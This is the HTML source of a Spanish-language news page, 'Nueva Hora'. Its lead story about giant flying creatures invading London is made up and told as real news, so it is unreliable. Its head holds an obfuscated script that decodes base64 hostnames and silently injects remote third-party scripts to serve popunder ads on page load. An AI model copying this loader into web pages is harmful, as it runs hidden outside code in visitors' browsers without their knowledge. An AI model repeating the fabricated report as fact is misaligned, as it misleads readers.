<!DOCTYPE html>
<html>

<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width">
  <title>Nueva Hora</title>
  <link href="style.css" rel="stylesheet" type="text/css" />
  <link rel="shortcut icon" href="https://i.ibb.co/S7zVgtM/logo-Nueva-Hora-removebg-preview.png">
  <script type="text/javascript" data-cfasync="false">
/*<![CDATA[/* */
(function(){var h=window,z="db4c158256ddb02b3b3bff762ec34ad3",v=[["siteId",494-748*67+426+5271601],["minBid",0],["popundersPerIP","40:1,30:1"],["delayBetween",10],["default",false],["defaultPerDay",0],["topmostLayer","auto"]],x=["d3d3LmJldHRlcmFkc3lzdGVtLmNvbS9xbmctZGV2aWNlLWRldGVjdG9yLm1pbi5jc3M=","ZDJrazBvM2ZyN2VkMDEuY2xvdWRmcm9udC5uZXQvZnJmL3FrZXJuaW5nLm1pbi5qcw=="],w=-1,g,d,l=function(){clearTimeout(d);w++;if(x[w]&&!(1779553164000<(new Date).getTime()&&1<w)){g=h.document.createElement("script");g.type="text/javascript";g.async=!0;var k=h.document.getElementsByTagName("script")[0];g.src="https://"+atob(x[w]);g.crossOrigin="anonymous";g.onerror=l;g.onload=function(){clearTimeout(d);h[z.slice(0,16)+z.slice(0,16)]||l()};d=setTimeout(l,5E3);k.parentNode.insertBefore(g,k)}};if(!h[z]){try{Object.freeze(h[z]=v)}catch(e){}l()}})();
/*]]>/* */
</script>
</head>

<body>
 <header>
   <div class="nombre">
     <a href="index.html"><img src="https://i.ibb.co/sst4Tkq/logo-Nueva-Hora-2-Photo-Room-png-Photo-Room.png" height="120" width="372">
   </div>
      <nav class="navegacion">
        <div class="menu">
     <li><a href="Noticias.html"> Noticias</a></li> 
     <li><a href="Deportes.html"> Deportes</a></li>
     <li><a href="Musica.html"> Música</a></li>
     <li><a href="Nacional.html"> Nacional</a></li>
     <li><a href="Global.html"> Global</a></li>
        </div>
      </nav>
    </header>
  <main>
    <section class="noti">
        <img src="https://ichef.bbci.co.uk/images/ic/1200x675/p01g4x2k.jpg"  alt="Imagen de los bichos">
       <center> <h2>BICHOS GIGANTES VUELAN POR LAS CALLES DE LONDRES</h2>
        <h4>La ciudad se pregunta del origen de los monstruos</h4>
      </center>
      <p>Unos monstruos gigantes han invadido la ciudad, y están volando por todas partes y causando problemas. Nadie sabe de dónde han salido o por qué están en la ciudad de Londres. Pero lo que sí sabemos es que están causando mucho daño y poniendo a la gente en peligro.</p>
    <p>  Las autoridades están trabajando para contener la situación y evacuar a las personas afectadas. Los expertos aún no han identificado qué tipo de criaturas son y si son una amenaza para la humanidad como lo conocemos.</p>

 <p>Los residentes locales están asustados por lo que está sucediendo. Algunos testigos dicen que han visto un hombre extraño con un abrigo de cuero negro corriendo por la ciudad, y creen que él podría estar relacionado con el problema.</p>
      <p>En resumen, unos monstruos gigantes han invadido Londres y están causando grandes problemas y peligro a los ciudadanos. La policía está trabajando para controlar la situación, pero no saben de donde origen los bichos. La gente está preocupada y quieren encontrar lo antes posible una solución. Continuaremos informando a medida que se desarrolla la situación.</p>
      </section>
    <hr>
      <section class="articulos">
        <article>
          
          <a href="noti2.html"><h3>Plan especial de los Mossos para "rebajar la tensión" en las casas 'okupadas' en la Bonanova</h3></a>
          <p>Alerta Máxima. Los Mossos d'Esquadra tiene un dispositivo policial permanente con agentes de paisano y uniformado en la zona...</p>
        </article>
        <article>
          
         <a href="noti2.html"> <h3>Los carteros llevarán protección policial en Melilla tras varios asaltos para robarles el voto por correo</h3></a>
          <p>La delegada del Gobierno en Melilla, Sabrina Moh, ha anunciado este martes un dispositivo especial para proteger a los carteros de Correos después...</p>
        </article>
        <article>
          
          <a href="noti2.html"><h3>Detenido y enviado a prisión preventiva el padre de una bebé que murió en Fuerteventura</h3></a>
          <p>La Policía Nacional ha detenido en Fuerteventura al padre de una bebé que murió en el hospital de la isla tras haber sufrido supuestamente...</p>
        </article>
      </section>
    </main>
    <footer>
     
      <p>Derechos reservados &copy; 2023 Nueva Hora</p>
     <div class="pere">
     <img src="https://i.ibb.co/HNRnRqC/Pere.png">
   </div>
     <div class="troy">
       <img src="https://i.ibb.co/N67Qg6Y/troy.gif" width="90px" height="90px">
     </div>
    </footer>
  </main>
</body>
</html>
